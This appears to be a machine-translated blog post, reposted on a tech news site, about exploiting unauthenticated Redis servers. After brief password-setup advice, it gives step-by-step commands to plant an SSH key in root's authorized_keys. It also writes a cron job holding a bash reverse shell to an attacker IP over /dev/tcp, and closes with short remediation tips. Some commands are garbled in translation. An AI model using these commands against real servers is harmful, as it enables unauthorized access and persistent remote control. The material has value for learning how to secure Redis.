Shulou(Shulou.com)06/01 Report--

Hello, big shots! I haven't written a blog record for a long time. Recently, I dug a redis unauthorized access vulnerability and took advantage of it. Here, I share this vulnerability that can directly obtain server permissions.

0x01:redis basics

Redis default configuration does not require password authentication, that is to say, as long as the host and port of the connected Redis server are correct, you can connect and use it. This will have certain security problems, so you need to enable Redis authentication password to increase the security of Redis server.

modify the configuration file

The configuration file for Redis is located in/etc/redis.conf by default, and you can find the following line:

#requirepass foobared

Remove the previous comment and change it to the required password:

requirpass myPassword (where myPassword is the password to be set)

Restart Redis

If Redis has been configured as a service, it can be restarted in the following ways:

service redis restart

If Redis is not configured as a service, it can be restarted by:

/usr/local/bin/redis-cli shutdown

/usr/local/bin/redis-server /etc/redis.conf

login verification

After setting Redis authentication password, the client needs to use-a parameter to enter authentication password when logging in. Although login can be successful without adding this parameter, it does not have any operation permission. As follows:

$ ./ redis-cli -h 127.0.0.1 -p 6379

127.0.0.1:6379> keys *

(error) NOAUTH Authentication required.

Log in with password authentication and verify operation permissions:

$ ./ redis-cli -h 127.0.0.1 -p 6379 -a myPassword

127.0.0.1:6379> config get requirepass

1) "requirepass"

2) "myPassword"

Seeing output similar to the above indicates that Reids password authentication configuration was successful.

0x02 Vulnerability Description

Vulnerability Description:

Redis can be accessed without authorization due to improper configuration, and is maliciously exploited by ***.

*** Access to internal data without authentication may lead to sensitive information disclosure, *** can also be malicious flushall to clean all data.

*** The user can execute lua code through EVAL or write backdoor files to disk through data backup function.

If Redis is running as root, *** can write SSH public key file to root account and log in to victim server directly through SSH.

Hazard:

*** The vulnerability can be exploited to write a planned task rebound shell

*** This vulnerability can be exploited to write SSH public key remote connections.

0x03: Exploit connects using redis connectivity tool. Windows learning and connection redis, redis download address: https://github.com/dmajkic/redis/downloads use redis-chli.exe connection

0x04: Advanced Exploitation

Principle:

1) SSH password-free login, you can set SSH password-free login under Linux, the method is to use "public and private key" authentication, that is, first create a pair of public and private keys on the client (public key file: ~/.ssh/id_rsa.pub; private key file: ~/.ssh/id_rsa). Then put the public key on the server (~/.ssh/authorized_keys) and keep the private key for yourself. When logging in using ssh, the ssh program sends the private key to match the public key on the server. If we get a match, we can log in. For details, please refer to (jingyan.baidu.com/article/2fb0ba4043124a00f2ec5f0f.html) SSH password free login remote server

2) Redis can be remotely managed through Redis-CLI, setting the default path of Redis and database cache files.

The method is as follows:

config set dir /xxx

config set dbfilename xxxx

set xxxx "xxx"save

vulnerability condition

1. Redis service starts with ROOT account

2. Redis service has no password authentication or uses weak password authentication

3. The server opens SSH service, and allows to use key login, that is, remotely write a public key, directly log in to the remote server.

First generate a pair of keys locally:

Then remotely connect to the target redis server via redis-clips and execute the following command

config set dir /root/.ssh/

config set dbfilename authorized_keys

set xxxx "\n\n\nssh-rsa key_pub\n\n", where key_pub is the public key generated in the above figure, that is, the public key can be saved in the remote server, so that you do not need to enter the account number and password when logging in. Redis has been compromised due to this vulnerability and found the written public key in its cache database, suggesting that users immediately investigate the internal network.

rebound shell

1. telnet login/you can also redis-cli login

telnet 192.168.236.130 6379//unauthorized login

config set dir /var/spool/cron/ //Path to the configuration folder (CONFIG SET command can dynamically adjust the configuration of Redis server without restarting)// Each user-generated crontab file is placed in the/var/spool/cron/directory

set -.- "\n\n\n* ** * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n"//Write bounce shell directly to the current user's crontab, newline is essential.

2.nc rebound

3. View crontab tasks in Centos.

0x06: Bug fixes

The vulnerability is patched as follows:

1) It is forbidden to start redis service with root privilege;

2) Enable password authentication for redis access and add IP access restrictions;

3) Do not open SSH service directly to public network as much as possible.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.